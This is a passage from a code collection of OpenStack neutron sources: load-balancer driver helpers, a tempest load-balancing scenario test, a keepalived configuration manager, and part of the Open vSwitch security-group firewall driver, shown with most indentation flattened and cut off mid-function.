creation_attrs.update(update_attrs)
return creation_attrs
def prepare_listener_for_update(self, listener):
sni_container_ids = self.prepare_sni_container_ids(listener)
listener_dict = {
'name': listener.name,
'description': listener.description,
'sni_container_ids': sni_container_ids,
'default_tls_container_id': listener.default_tls_container_id,
'connection_limit': listener.connection_limit,
'admin_state_up': listener.admin_state_up
}
return listener_dict
def prepare_pool_for_creation(self, pool):
create_attrs = {
'id': pool.id,
'tenant_id': pool.tenant_id,
'listener_id': pool.listener.id,
'protocol': pool.protocol,
}
update_attrs = self.prepare_pool_for_update(pool)
create_attrs.update(update_attrs)
return create_attrs
def prepare_pool_for_update(self, pool):
update_attrs = {
'name': pool.name,
'description': pool.description,
'lb_algorithm': pool.lb_algorithm,
'admin_state_up': pool.admin_state_up
}
if pool.session_persistence:
            persistence = pool.session_persistence
            persistence_payload = self.prepare_sessionpersistence(persistence)
            update_attrs['session_persistence'] = persistence_payload
return update_attrs
def prepare_sessionpersistence(self, persistence):
return {
'type': persistence.type,
'cookie_name': persistence.cookie_name
}
def prepare_members_for_pool(self, members):
members_attrs = []
for member in members:
member_attrs = self.prepare_member_for_creation(member)
members_attrs.append(member_attrs)
return members_attrs
def prepare_member_for_creation(self, member):
creation_attrs = {
'id': member.id,
'tenant_id': member.tenant_id,
'address': member.address,
'protocol_port': member.protocol_port,
'subnet_id': member.subnet_id
}
update_attrs = self.prepare_member_for_update(member)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_member_for_update(self, member):
return {
'weight': member.weight,
'admin_state_up': member.admin_state_up,
}
def prepare_healthmonitor_for_creation(self, health_monitor):
creation_attrs = {
'id': health_monitor.id,
'tenant_id': health_monitor.tenant_id,
'pool_id': health_monitor.pool.id,
'type': health_monitor.type,
}
update_attrs = self.prepare_healthmonitor_for_update(health_monitor)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_healthmonitor_for_update(self, health_monitor):
ncc_hm = {
'delay': health_monitor.delay,
'timeout': health_monitor.timeout,
'max_retries': health_monitor.max_retries,
'admin_state_up': health_monitor.admin_state_up,
}
if health_monitor.type in ['HTTP', 'HTTPS']:
ncc_hm['http_method'] = health_monitor.http_method
ncc_hm['url_path'] = health_monitor.url_path
ncc_hm['expected_codes'] = health_monitor.expected_codes
return ncc_hm
def get_network_info(self, context, plugin, subnet_id):
network_info = {}
subnet = plugin.db._core_plugin.get_subnet(context, subnet_id)
network_id = subnet['network_id']
network = plugin.db._core_plugin.get_network(context, network_id)
network_info['network_id'] = network_id
network_info['subnet_id'] = subnet_id
if PROV_NET_TYPE in network:
network_info['network_type'] = network[PROV_NET_TYPE]
if PROV_SEGMT_ID in network:
network_info['segmentation_id'] = network[PROV_SEGMT_ID]
return network_info
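        # Illustrative result (hypothetical values): for a VLAN provider
        # network the returned dict would look like
        #     {'network_id': <uuid>, 'subnet_id': <uuid>,
        #      'network_type': 'vlan', 'segmentation_id': 1001}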
def prepare_sni_container_ids(self, listener):
sni_container_ids = []
for sni_container in listener.sni_containers:
sni_container_ids.append(sni_container.tls_container_id)
return sni_container_ids
class NetScalerStatusService(service.Service):
def __init__(self, driver):
super(NetScalerStatusService, self).__init__()
self.driver = driver
def start(self):
super(NetScalerStatusService, self).start()
self.tg.add_timer(
int(self.driver.periodic_task_interval),
self.driver.collect_provision_status,
None
)
```
#### File: v2/scenario/test_load_balancer_basic.py
```python
from tempest import test
from neutron_lbaas.tests.tempest.v2.scenario import base
class TestLoadBalancerBasic(base.BaseTestCase):
@test.services('compute', 'network')
def test_load_balancer_basic(self):
"""This test checks basic load balancing.
The following is the scenario outline:
1. Create an instance.
2. SSH to the instance and start two servers.
3. Create a load balancer with two members and with ROUND_ROBIN
algorithm.
4. Associate the VIP with a floating ip.
5. Send NUM requests to the floating ip and check that they are shared
between the two servers.
"""
self._create_server('server1')
self._start_servers()
self._create_load_balancer()
self._check_load_balancing()
``` |
{
"source": "2020human/neutron",
"score": 2
} |
#### File: agent/linux/keepalived.py
```python
import errno
import itertools
import os
import netaddr
from neutron_lib import exceptions
from neutron_lib.utils import file as file_utils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import fileutils
from neutron._i18n import _, _LE
from neutron.agent.linux import external_process
from neutron.common import constants
VALID_STATES = ['MASTER', 'BACKUP']
VALID_AUTH_TYPES = ['AH', 'PASS']
HA_DEFAULT_PRIORITY = 50
PRIMARY_VIP_RANGE_SIZE = 24
KEEPALIVED_SERVICE_NAME = 'keepalived'
KEEPALIVED_EMAIL_FROM = '<EMAIL>'
KEEPALIVED_ROUTER_ID = 'neutron'
GARP_MASTER_DELAY = 60
LOG = logging.getLogger(__name__)
def get_free_range(parent_range, excluded_ranges, size=PRIMARY_VIP_RANGE_SIZE):
"""Get a free IP range, from parent_range, of the specified size.
:param parent_range: String representing an IP range. E.g: '169.254.0.0/16'
:param excluded_ranges: A list of strings to be excluded from parent_range
:param size: What should be the size of the range returned?
:return: A string representing an IP range
"""
free_cidrs = netaddr.IPSet([parent_range]) - netaddr.IPSet(excluded_ranges)
for cidr in free_cidrs.iter_cidrs():
if cidr.prefixlen <= size:
return '%s/%s' % (cidr.network, size)
raise ValueError(_('Network of size %(size)s, from IP range '
'%(parent_range)s excluding IP ranges '
'%(excluded_ranges)s was not found.') %
{'size': size,
'parent_range': parent_range,
'excluded_ranges': excluded_ranges})
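# Illustrative usage (hypothetical values, not from the original module):
#     get_free_range('169.254.0.0/16', ['169.254.0.0/24'], size=24)
# is expected to return the first free /24, e.g. '169.254.1.0/24'.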
class InvalidInstanceStateException(exceptions.NeutronException):
message = _('Invalid instance state: %(state)s, valid states are: '
'%(valid_states)s')
def __init__(self, **kwargs):
if 'valid_states' not in kwargs:
kwargs['valid_states'] = ', '.join(VALID_STATES)
super(InvalidInstanceStateException, self).__init__(**kwargs)
class InvalidAuthenticationTypeException(exceptions.NeutronException):
message = _('Invalid authentication type: %(auth_type)s, '
'valid types are: %(valid_auth_types)s')
def __init__(self, **kwargs):
if 'valid_auth_types' not in kwargs:
kwargs['valid_auth_types'] = ', '.join(VALID_AUTH_TYPES)
super(InvalidAuthenticationTypeException, self).__init__(**kwargs)
class KeepalivedVipAddress(object):
"""A virtual address entry of a keepalived configuration."""
def __init__(self, ip_address, interface_name, scope=None):
self.ip_address = ip_address
self.interface_name = interface_name
self.scope = scope
def __eq__(self, other):
return (isinstance(other, KeepalivedVipAddress) and
self.ip_address == other.ip_address)
def __str__(self):
return '[%s, %s, %s]' % (self.ip_address,
self.interface_name,
self.scope)
def build_config(self):
result = '%s dev %s' % (self.ip_address, self.interface_name)
if self.scope:
result += ' scope %s' % self.scope
return result
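    # Illustrative example (hypothetical values):
    #     KeepalivedVipAddress('10.0.0.5/24', 'qr-aaa', 'link').build_config()
    # is expected to return '10.0.0.5/24 dev qr-aaa scope link'.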
class KeepalivedVirtualRoute(object):
"""A virtual route entry of a keepalived configuration."""
def __init__(self, destination, nexthop, interface_name=None,
scope=None):
self.destination = destination
self.nexthop = nexthop
self.interface_name = interface_name
self.scope = scope
def build_config(self):
output = self.destination
if self.nexthop:
output += ' via %s' % self.nexthop
if self.interface_name:
output += ' dev %s' % self.interface_name
if self.scope:
output += ' scope %s' % self.scope
return output
class KeepalivedInstanceRoutes(object):
def __init__(self):
self.gateway_routes = []
self.extra_routes = []
self.extra_subnets = []
def remove_routes_on_interface(self, interface_name):
self.gateway_routes = [gw_rt for gw_rt in self.gateway_routes
if gw_rt.interface_name != interface_name]
# NOTE(amuller): extra_routes are initialized from the router's
# 'routes' attribute. These routes do not have an interface
# parameter and so cannot be removed via an interface_name lookup.
self.extra_subnets = [route for route in self.extra_subnets if
route.interface_name != interface_name]
@property
def routes(self):
return self.gateway_routes + self.extra_routes + self.extra_subnets
def __len__(self):
return len(self.routes)
def build_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.routes),
[' }'])
class KeepalivedInstance(object):
"""Instance section of a keepalived configuration."""
def __init__(self, state, interface, vrouter_id, ha_cidrs,
priority=HA_DEFAULT_PRIORITY, advert_int=None,
mcast_src_ip=None, nopreempt=False,
garp_master_delay=GARP_MASTER_DELAY):
self.name = 'VR_%s' % vrouter_id
if state not in VALID_STATES:
raise InvalidInstanceStateException(state=state)
self.state = state
self.interface = interface
self.vrouter_id = vrouter_id
self.priority = priority
self.nopreempt = nopreempt
self.advert_int = advert_int
self.mcast_src_ip = mcast_src_ip
self.garp_master_delay = garp_master_delay
self.track_interfaces = []
self.vips = []
self.virtual_routes = KeepalivedInstanceRoutes()
self.authentication = None
self.primary_vip_range = get_free_range(
parent_range=constants.PRIVATE_CIDR_RANGE,
excluded_ranges=[constants.METADATA_CIDR,
constants.DVR_FIP_LL_CIDR] + ha_cidrs,
size=PRIMARY_VIP_RANGE_SIZE)
def set_authentication(self, auth_type, password):
if auth_type not in VALID_AUTH_TYPES:
raise InvalidAuthenticationTypeException(auth_type=auth_type)
self.authentication = (auth_type, password)
def add_vip(self, ip_cidr, interface_name, scope):
vip = KeepalivedVipAddress(ip_cidr, interface_name, scope)
if vip not in self.vips:
self.vips.append(vip)
else:
LOG.debug('VIP %s already present in %s', vip, self.vips)
def remove_vips_vroutes_by_interface(self, interface_name):
self.vips = [vip for vip in self.vips
if vip.interface_name != interface_name]
self.virtual_routes.remove_routes_on_interface(interface_name)
def remove_vip_by_ip_address(self, ip_address):
self.vips = [vip for vip in self.vips
if vip.ip_address != ip_address]
def get_existing_vip_ip_addresses(self, interface_name):
return [vip.ip_address for vip in self.vips
if vip.interface_name == interface_name]
def _build_track_interface_config(self):
return itertools.chain(
[' track_interface {'],
(' %s' % i for i in self.track_interfaces),
[' }'])
def get_primary_vip(self):
"""Return an address in the primary_vip_range CIDR, with the router's
VRID in the host section.
For example, if primary_vip_range is 169.254.0.0/24, and this router's
VRID is 5, the result is 169.254.0.5. Using the VRID assures that
the primary VIP is consistent amongst HA router instances on different
nodes.
"""
ip = (netaddr.IPNetwork(self.primary_vip_range).network +
self.vrouter_id)
return str(netaddr.IPNetwork('%s/%s' % (ip, PRIMARY_VIP_RANGE_SIZE)))
def _build_vips_config(self):
# NOTE(amuller): The primary VIP must be consistent in order to avoid
# keepalived bugs. Changing the VIP in the 'virtual_ipaddress' and
# SIGHUP'ing keepalived can remove virtual routers, including the
# router's default gateway.
# We solve this by never changing the VIP in the virtual_ipaddress
# section, herein known as the primary VIP.
# The only interface known to exist for HA routers is the HA interface
# (self.interface). We generate an IP on that device and use it as the
# primary VIP. The other VIPs (Internal interfaces IPs, the external
# interface IP and floating IPs) are placed in the
# virtual_ipaddress_excluded section.
primary = KeepalivedVipAddress(self.get_primary_vip(), self.interface)
vips_result = [' virtual_ipaddress {',
' %s' % primary.build_config(),
' }']
if self.vips:
vips_result.extend(
itertools.chain([' virtual_ipaddress_excluded {'],
(' %s' % vip.build_config()
for vip in
sorted(self.vips,
key=lambda vip: vip.ip_address)),
[' }']))
return vips_result
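        # Illustrative output (hypothetical interface names): with a primary
        # VIP of '169.254.0.5/24' on HA interface 'ha-aaa' and one excluded
        # VIP '10.0.0.3/24' on 'qr-bbb', the generated lines are roughly:
        #     virtual_ipaddress {
        #         169.254.0.5/24 dev ha-aaa
        #     }
        #     virtual_ipaddress_excluded {
        #         10.0.0.3/24 dev qr-bbb
        #     }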
def _build_virtual_routes_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.virtual_routes),
[' }'])
def build_config(self):
config = ['vrrp_instance %s {' % self.name,
' state %s' % self.state,
' interface %s' % self.interface,
' virtual_router_id %s' % self.vrouter_id,
' priority %s' % self.priority,
' garp_master_delay %s' % self.garp_master_delay]
if self.nopreempt:
config.append(' nopreempt')
if self.advert_int:
config.append(' advert_int %s' % self.advert_int)
if self.authentication:
auth_type, password = self.authentication
authentication = [' authentication {',
' auth_type %s' % auth_type,
' auth_pass %s' % password,
' }']
config.extend(authentication)
if self.mcast_src_ip:
config.append(' mcast_src_ip %s' % self.mcast_src_ip)
if self.track_interfaces:
config.extend(self._build_track_interface_config())
config.extend(self._build_vips_config())
if len(self.virtual_routes):
config.extend(self.virtual_routes.build_config())
config.append('}')
return config
class KeepalivedConf(object):
"""A keepalived configuration."""
def __init__(self):
self.reset()
def reset(self):
self.instances = {}
def add_instance(self, instance):
self.instances[instance.vrouter_id] = instance
def get_instance(self, vrouter_id):
return self.instances.get(vrouter_id)
def build_config(self):
config = ['global_defs {',
' notification_email_from %s' % KEEPALIVED_EMAIL_FROM,
' router_id %s' % KEEPALIVED_ROUTER_ID,
'}'
]
for instance in self.instances.values():
config.extend(instance.build_config())
return config
def get_config_str(self):
"""Generates and returns the keepalived configuration.
:return: Keepalived configuration string.
"""
return '\n'.join(self.build_config())
class KeepalivedManager(object):
"""Wrapper for keepalived.
This wrapper writes keepalived config files and starts/restarts the
keepalived process.
"""
def __init__(self, resource_id, config, process_monitor, conf_path='/tmp',
namespace=None):
self.resource_id = resource_id
self.config = config
self.namespace = namespace
self.process_monitor = process_monitor
self.conf_path = conf_path
def get_conf_dir(self):
confs_dir = os.path.abspath(os.path.normpath(self.conf_path))
conf_dir = os.path.join(confs_dir, self.resource_id)
return conf_dir
def get_full_config_file_path(self, filename, ensure_conf_dir=True):
conf_dir = self.get_conf_dir()
if ensure_conf_dir:
fileutils.ensure_tree(conf_dir, mode=0o755)
return os.path.join(conf_dir, filename)
def _output_config_file(self):
config_str = self.config.get_config_str()
config_path = self.get_full_config_file_path('keepalived.conf')
file_utils.replace_file(config_path, config_str)
return config_path
@staticmethod
def _safe_remove_pid_file(pid_file):
try:
os.remove(pid_file)
except OSError as e:
if e.errno != errno.ENOENT:
LOG.error(_LE("Could not delete file %s, keepalived can "
"refuse to start."), pid_file)
def get_vrrp_pid_file_name(self, base_pid_file):
return '%s-vrrp' % base_pid_file
def get_conf_on_disk(self):
config_path = self.get_full_config_file_path('keepalived.conf')
try:
with open(config_path) as conf:
return conf.read()
except (OSError, IOError) as e:
if e.errno != errno.ENOENT:
raise
def spawn(self):
config_path = self._output_config_file()
keepalived_pm = self.get_process()
vrrp_pm = self._get_vrrp_process(
self.get_vrrp_pid_file_name(keepalived_pm.get_pid_file_name()))
keepalived_pm.default_cmd_callback = (
self._get_keepalived_process_callback(vrrp_pm, config_path))
keepalived_pm.enable(reload_cfg=True)
self.process_monitor.register(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME,
monitored_process=keepalived_pm)
LOG.debug('Keepalived spawned with config %s', config_path)
def disable(self):
self.process_monitor.unregister(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME)
pm = self.get_process()
pm.disable(sig='15')
def get_process(self):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pids_path=self.conf_path)
def _get_vrrp_process(self, pid_file):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pid_file=pid_file)
def _get_keepalived_process_callback(self, vrrp_pm, config_path):
def callback(pid_file):
# If the keepalived process crashed unexpectedly, the vrrp process
# will be orphaned and prevent a new keepalived process from being
# spawned. A check here lets the l3-agent kill the orphan process
# and spawn keepalived successfully.
if vrrp_pm.active:
vrrp_pm.disable()
self._safe_remove_pid_file(pid_file)
self._safe_remove_pid_file(self.get_vrrp_pid_file_name(pid_file))
cmd = ['keepalived', '-P',
'-f', config_path,
'-p', pid_file,
'-r', self.get_vrrp_pid_file_name(pid_file)]
return cmd
return callback
```
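A minimal standalone sketch of the primary-VIP arithmetic described in get_primary_vip() above; the concrete range, VRID and prefix size below are assumed values for illustration, not values taken from the module:

```python
# Illustrative sketch only: reproduces the get_primary_vip() arithmetic
# with assumed values (primary_vip_range, vrouter_id and
# PRIMARY_VIP_RANGE_SIZE are stand-ins, not the module's real constants).
import netaddr

primary_vip_range = '169.254.0.0/24'
vrouter_id = 5
PRIMARY_VIP_RANGE_SIZE = 24

# Adding the VRID to the network address yields a deterministic, per-router IP.
ip = netaddr.IPNetwork(primary_vip_range).network + vrouter_id
print(str(netaddr.IPNetwork('%s/%s' % (ip, PRIMARY_VIP_RANGE_SIZE))))
# -> 169.254.0.5/24
```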
#### File: linux/openvswitch_firewall/firewall.py
```python
import netaddr
from neutron_lib import constants as lib_const
from neutron_lib import exceptions
from oslo_log import log as logging
from oslo_utils import netutils
from neutron._i18n import _, _LE, _LW
from neutron.agent import firewall
from neutron.agent.linux.openvswitch_firewall import constants as ovsfw_consts
from neutron.agent.linux.openvswitch_firewall import rules
from neutron.common import constants
from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants \
as ovs_consts
LOG = logging.getLogger(__name__)
def _replace_register(flow_params, register_number, register_value):
"""Replace value from flows to given register number
'register_value' key in dictionary will be replaced by register number
given by 'register_number'
:param flow_params: Dictionary containing defined flows
:param register_number: The number of register where value will be stored
:param register_value: Key to be replaced by register number
"""
try:
reg_port = flow_params[register_value]
del flow_params[register_value]
flow_params['reg{:d}'.format(register_number)] = reg_port
except KeyError:
pass
def create_reg_numbers(flow_params):
"""Replace reg_(port|net) values with defined register numbers"""
_replace_register(flow_params, ovsfw_consts.REG_PORT, 'reg_port')
_replace_register(flow_params, ovsfw_consts.REG_NET, 'reg_net')
class OVSFWPortNotFound(exceptions.NeutronException):
message = _("Port %(port_id)s is not managed by this agent. ")
class SecurityGroup(object):
def __init__(self, id_):
self.id = id_
self.raw_rules = []
self.remote_rules = []
self.members = {}
self.ports = set()
def update_rules(self, rules):
"""Separate raw and remote rules."""
self.raw_rules = [rule for rule in rules
if 'remote_group_id' not in rule]
self.remote_rules = [rule for rule in rules
if 'remote_group_id' in rule]
def get_ethertype_filtered_addresses(self, ethertype,
exclude_addresses=None):
exclude_addresses = set(exclude_addresses) if exclude_addresses else set()
group_addresses = set(self.members.get(ethertype, []))
return list(group_addresses - exclude_addresses)
class OFPort(object):
def __init__(self, port_dict, ovs_port, vlan_tag):
self.id = port_dict['device']
self.vlan_tag = vlan_tag
self.mac = ovs_port.vif_mac
self.lla_address = str(netutils.get_ipv6_addr_by_EUI64(
lib_const.IPv6_LLA_PREFIX, self.mac))
self.ofport = ovs_port.ofport
self.sec_groups = list()
self.fixed_ips = port_dict.get('fixed_ips', [])
self.neutron_port_dict = port_dict.copy()
self.allowed_pairs_v4 = self._get_allowed_pairs(port_dict, version=4)
self.allowed_pairs_v6 = self._get_allowed_pairs(port_dict, version=6)
@staticmethod
def _get_allowed_pairs(port_dict, version):
aap_dict = port_dict.get('allowed_address_pairs', set())
return {(aap['mac_address'], aap['ip_address']) for aap in aap_dict
if netaddr.IPAddress(aap['ip_address']).version == version}
@property
def ipv4_addresses(self):
return [ip_addr for ip_addr in self.fixed_ips
if netaddr.IPAddress(ip_addr).version == 4]
@property
def ipv6_addresses(self):
return [ip_addr for ip_addr in self.fixed_ips
if netaddr.IPAddress(ip_addr).version == 6]
def update(self, port_dict):
self.allowed_pairs_v4 = self._get_allowed_pairs(port_dict,
version=4)
self.allowed_pairs_v6 = self._get_allowed_pairs(port_dict,
version=6)
# Neighbour discovery uses LLA
self.allowed_pairs_v6.add((self.mac, self.lla_address))
self.fixed_ips = port_dict.get('fixed_ips', [])
self.neutron_port_dict = port_dict.copy()
class SGPortMap(object):
def __init__(self):
self.ports = {}
self.sec_groups = {}
def get_or_create_sg(self, sg_id):
try:
sec_group = self.sec_groups[sg_id]
except KeyError:
sec_group = SecurityGroup(sg_id)
self.sec_groups[sg_id] = sec_group
return sec_group
def create_port(self, port, port_dict):
self.ports[port.id] = port
self.update_port(port, port_dict)
def update_port(self, port, port_dict):
for sec_group in self.sec_groups.values():
sec_group.ports.discard(port)
port.sec_groups = [self.get_or_create_sg(sg_id)
for sg_id in port_dict['security_groups']]
for sec_group in port.sec_groups:
sec_group.ports.add(port)
port.update(port_dict)
def remove_port(self, port):
for sec_group in port.sec_groups:
sec_group.ports.discard(port)
del self.ports[port.id]
def update_rules(self, sg_id, rules):
sec_group = self.get_or_create_sg(sg_id)
sec_group.update_rules(rules)
def update_members(self, sg_id, members):
sec_group = self.get_or_create_sg(sg_id)
sec_group.members = members
class OVSFirewallDriver(firewall.FirewallDriver):
REQUIRED_PROTOCOLS = [
ovs_consts.OPENFLOW10,
ovs_consts.OPENFLOW11,
ovs_consts.OPENFLOW12,
ovs_consts.OPENFLOW13,
ovs_consts.OPENFLOW14,
]
provides_arp_spoofing_protection = True
def __init__(self, integration_bridge):
"""Initialize object
:param integration_bridge: Bridge on which openflow rules will be
applied
"""
self.int_br = self.initialize_bridge(integration_bridge)
self.sg_port_map = SGPortMap()
self._deferred = False
self._drop_all_unmatched_flows()
def security_group_updated(self, action_type, sec_group_ids,
device_ids=None):
"""The current driver doesn't make use of this method.
It exists here to avoid NotImplementedError raised from the parent
class's method.
"""
def _accept_flow(self, **flow):
flow['ct_state'] = ovsfw_consts.OF_STATE_ESTABLISHED_NOT_REPLY
self._add_flow(**flow)
flow['ct_state'] = ovsfw_consts.OF_STATE_NEW_NOT_ESTABLISHED
if flow['table'] == ovs_consts.RULES_INGRESS_TABLE:
flow['actions'] = (
'ct(commit,zone=NXM_NX_REG{:d}[0..15]),{:s}'.format(
ovsfw_consts.REG_NET, flow['actions']))
self._add_flow(**flow)
def _add_flow(self, **kwargs):
dl_type = kwargs.get('dl_type')
create_reg_numbers(kwargs)
if isinstance(dl_type, int):
kwargs['dl_type'] = "0x{:04x}".format(dl_type)
if self._deferred:
self.int_br.add_flow(**kwargs)
else:
self.int_br.br.add_flow(**kwargs)
def _delete_flows(self, **kwargs):
create_reg_numbers(kwargs)
if self._deferred:
self.int_br.delete_flows(**kwargs)
else:
self.int_br.br.delete_flows(**kwargs)
@staticmethod
def initialize_bridge(int_br):
int_br.set_protocols(OVSFirewallDriver.REQUIRED_PROTOCOLS)
return int_br.deferred(full_ordered=True)
def _drop_all_unmatched_flows(self):
for table in ovs_consts.OVS_FIREWALL_TABLES:
self.int_br.br.add_flow(table=table, priority=0, actions='drop')
def get_or_create_ofport(self, port):
port_id = port['device']
try:
of_port = self.sg_port_map.ports[port_id]
except KeyError:
ovs_port = self.int_br.br.get_vif_port_by_id(port_id)
if not ovs_port:
raise OVSFWPortNotFound(port_id=port_id)
try:
other_config = self.int_br.br.db_get_val(
'Port', ovs_port.port_name, 'other_config')
port_vlan_id = int(other_config['tag'])
except (KeyError, TypeError):
LOG.warning(_LW("Cannot get tag for port %(port_id)s from "
"its other_config: %(other_config)s"),
{'port_id': port_id,
'other_config': other_config})
port_vlan_id = ovs_consts.DEAD_VLAN_TAG
of_port = OFPort(port, ovs_port, port_vlan_id)
self.sg_port_map.create_port(of_port, port)
else:
self.sg_port_map.update_port(of_port, port)
return of_port
def is_port_managed(self, port):
return port['device'] in self.sg_port_map.ports
def prepare_port_filter(self, port):
if not firewall.port_sec_enabled(port):
return
port_exists = self.is_port_managed(port)
of_port = self.get_or_create_ofport(port)
if port_exists:
LOG.error(_LE("Initializing port %s that was already "
"initialized."),
port['device'])
self.delete_all_port_flows(of_port)
self.initialize_port_flows(of_port)
self.add_flows_from_rules(of_port)
def update_port_filter(self, port):
"""Update rules for given port
Current existing filtering rules are removed and new ones are generated
based on current loaded security group rules and members.
"""
if not firewall.port_sec_enabled(port):
self.remove_port_filter(port)
return
elif not self.is_port_managed(port):
self.prepare_port_filter(port)
return
of_port = self.get_or_create_ofport(port)
# TODO(jlibosva): Handle firewall blink
self.delete_all_port_flows(of_port)
self.initialize_port_flows(of_port)
self.add_flows_from_rules(of_port)
def remove_port_filter(self, port):
"""Remove port from firewall
All flows related to this port are removed from OVS. The port is also
removed from the set of ports managed by this firewall.
"""
if self.is_port_managed(port):
of_port = self.get_or_create_ofport(port)
self.delete_all_port_flows(of_port)
self.sg_port_map.remove_port(of_port)
def update_security_group_rules(self, sg_id, rules):
self.sg_port_map.update_rules(sg_id, rules)
def update_security_group_members(self, sg_id, member_ips):
self.sg_port_map.update_members(sg_id, member_ips)
def filter_defer_apply_on(self):
self._deferred = True
def filter_defer_apply_off(self):
if self._deferred:
self.int_br.apply_flows()
self._deferred = False
@property
def ports(self):
return {id_: port.neutron_port_dict
for id_, port in self.sg_port_map.ports.items()}
def initialize_port_flows(self, port):
"""Set base flows for port
:param port: OFPort instance
"""
# Identify egress flow
self._add_flow(
table=ovs_consts.LOCAL_SWITCHING,
priority=100,
in_port=port.ofport,
actions='set_field:{:d}->reg{:d},'
'set_field:{:d}->reg{:d},'
'resubmit(,{:d})'.format(
port.ofport,
ovsfw_consts.REG_PORT,
port.vlan_tag,
ovsfw_consts.REG_NET,
ovs_consts.BASE_EGRESS_TABLE)
)
# Identify ingress flows after egress filtering
self._add_flow(
table=ovs_consts.LOCAL_SWITCHING,
priority=90,
dl_dst=port.mac,
actions='set_field:{:d}->reg{:d},'
'set_field:{:d}->reg{:d},'
'resubmit(,{:d})'.format(
port.ofport,
ovsfw_consts.REG_PORT,
port.vlan_tag,
ovsfw_consts.REG_NET,
ovs_consts.BASE_INGRESS_TABLE),
)
self._initialize_egress(port)
self._initialize_ingress(port)
def _initialize_egress_ipv6_icmp(self, port):
for icmp_type in firewall.ICMPV6_ALLOWED_TYPES:
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=95,
in_port=port.ofport,
reg_port=port.ofport,
dl_type=constants.ETHERTYPE_IPV6,
nw_proto=lib_const.PROTO_NUM_IPV6_ICMP,
icmp_type=icmp_type,
actions='normal'
)
def _initialize_egress(self, port):
"""Identify egress traffic and send it to egress base"""
self._initialize_egress_ipv6_icmp(port)
# Apply mac/ip pairs for IPv4
allowed_pairs = port.allowed_pairs_v4.union(
{(port.mac, ip_addr) for ip_addr in port.ipv4_addresses})
for mac_addr, ip_addr in allowed_pairs:
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=95,
in_port=port.ofport,
reg_port=port.ofport,
dl_src=mac_addr,
dl_type=constants.ETHERTYPE_ARP,
arp_spa=ip_addr,
actions='normal'
)
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=65,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
dl_type=constants.ETHERTYPE_IP,
in_port=port.ofport,
dl_src=mac_addr,
nw_src=ip_addr,
actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format(
ovs_consts.RULES_EGRESS_TABLE,
ovsfw_consts.REG_NET)
)
# Apply mac/ip pairs for IPv6
allowed_pairs = port.allowed_pairs_v6.union(
{(port.mac, ip_addr) for ip_addr in port.ipv6_addresses})
for mac_addr, ip_addr in allowed_pairs:
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=65,
reg_port=port.ofport,
in_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
dl_type=constants.ETHERTYPE_IPV6,
dl_src=mac_addr,
ipv6_src=ip_addr,
actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format(
ovs_consts.RULES_EGRESS_TABLE,
ovsfw_consts.REG_NET)
)
# DHCP discovery
for dl_type, src_port, dst_port in (
(constants.ETHERTYPE_IP, 68, 67),
(constants.ETHERTYPE_IPV6, 546, 547)):
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=80,
reg_port=port.ofport,
in_port=port.ofport,
dl_type=dl_type,
nw_proto=lib_const.PROTO_NUM_UDP,
tp_src=src_port,
tp_dst=dst_port,
actions='resubmit(,{:d})'.format(
ovs_consts.ACCEPT_OR_INGRESS_TABLE)
)
# Block a DHCP server running on an instance (drop server-side DHCP traffic)
for dl_type, src_port, dst_port in (
(constants.ETHERTYPE_IP, 67, 68),
(constants.ETHERTYPE_IPV6, 547, 546)):
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=70,
in_port=port.ofport,
reg_port=port.ofport,
dl_type=dl_type,
nw_proto=lib_const.PROTO_NUM_UDP,
tp_src=src_port,
tp_dst=dst_port,
actions='drop'
)
# Drop all remaining not tracked egress connections
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=10,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
in_port=port.ofport,
reg_port=port.ofport,
actions='drop'
)
# Fill in accept_or_ingress table by checking that traffic is ingress
# and if not, accept it
self._add_flow(
table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
priority=100,
dl_dst=port.mac,
actions='set_field:{:d}->reg{:d},resubmit(,{:d})'.format(
port.ofport,
ovsfw_consts.REG_PORT,
ovs_consts.BASE_INGRESS_TABLE),
)
for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]:
self._add_flow(
table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
priority=90,
dl_type=ethertype,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NEW_NOT_ESTABLISHED,
actions='ct(commit,zone=NXM_NX_REG{:d}[0..15]),normal'.format(
ovsfw_consts.REG_NET)
)
self._add_flow(
table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
priority=80,
reg_port=port.ofport,
actions='normal'
)
def _initialize_tracked_egress(self, port):
# Drop invalid packets
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=50,
ct_state=ovsfw_consts.OF_STATE_INVALID,
actions='drop'
)
# Drop traffic for removed sg rules
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=50,
reg_port=port.ofport,
ct_mark=ovsfw_consts.CT_MARK_INVALID,
actions='drop'
)
for state in (
ovsfw_consts.OF_STATE_ESTABLISHED_REPLY,
ovsfw_consts.OF_STATE_RELATED,
):
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=50,
ct_state=state,
ct_mark=ovsfw_consts.CT_MARK_NORMAL,
reg_port=port.ofport,
